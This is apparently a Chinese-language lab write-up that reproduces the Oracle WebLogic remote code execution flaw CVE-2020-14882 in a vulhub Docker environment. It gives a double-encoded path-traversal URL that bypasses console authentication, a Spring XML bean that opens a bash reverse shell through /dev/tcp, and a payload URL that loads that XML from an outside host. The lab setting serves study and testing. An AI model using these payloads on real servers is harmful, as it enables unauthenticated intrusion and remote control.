一、漏洞描述
2020年10月28日,Oracle發布的10月安全更新中的Oracle WebLogic Server 遠程代碼執行漏洞(CVE-2020-14882)POC被公開,遠程攻擊者可以通過發送惡意的HTTP GET 請求。成功利用此漏洞的攻擊者可在未經身份驗證的情況下控制 WebLogic Server Console ,並執行任意代碼。
影響版本
WebLogic 10.3.6.0.0
WebLogic 12.1.3.0.0
WebLogic 12.2.1.3.0
WebLogic 12.2.1.4.0
WebLogic 14.1.1.0.0
二、漏洞環境搭建
需要准備的工具如下:
1.docker+vulhub漏洞庫
2.kali虛擬機
3.靶機Ubuntu18.04虛擬機(其他也可以)
4.Burpsuite
打開Ubuntu虛擬機,有docker環境和vulhub漏洞庫的話就直接進入環境,沒有的話先安裝docker和下載vulhub漏洞庫(網上教程很多,這里就不多介紹了)
root@admin666-virtual-machine:~/vulhub/weblogic/CVE-2020-14882#
執行命令 docker-compose up -d
root@admin666-virtual-machine:~/vulhub/weblogic/CVE-2020-14882# docker-compose up -d
等環境搭建完成后,可以訪問 http://your-ip:7001 出現如下頁面證明搭建成功!
三、漏洞利用
漏洞1:
使用此 URL 繞過控制台組件的身份驗證:
直接訪問http://your-ip:7001/console/css/%252e%252e%252fconsole.portal即可未授權訪問
漏洞2:
利用xml反彈shell
<?xml version="1.0" encoding="UTF-8" ?>
<beans xmlns="http://www.springframework.org/schema/beans"
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xsi:schemaLocation="http://www.springframework.org/schema/beans http://www.springframework.org/schema/beans/spring-beans.xsd">
<bean id="pb" class="java.lang.ProcessBuilder" init-method="start">
<constructor-arg>
<list>
<value>bash</value>
<value>-c</value>
<value><![CDATA[bash -i >& /dev/tcp/ip/port 0>&1]]></value>
</list>
</constructor-arg>
</bean>
</beans>
將該xml放到本地搭建的服務器上,靶機可以訪問到就行,構造payload反彈shell到kali虛擬機里。
payload:
http://your-ip:7001/console/css/%252e%252e%252fconsole.portal?_nfpb=true&_pageLabel=&handle=com.bea.core.repackaged.springframework.context.support.FileSystemXmlApplicationContext("http://example.com/rce.xml")
這里將xml文件放在本機phpstudy的目錄下,可以先用靶機訪問下
而后打開kali,訪問構造好的payload(這里將包放在Burp中),使用nc監聽反彈端口即可成功反彈shell
四、關閉docker環境
docker-compose down
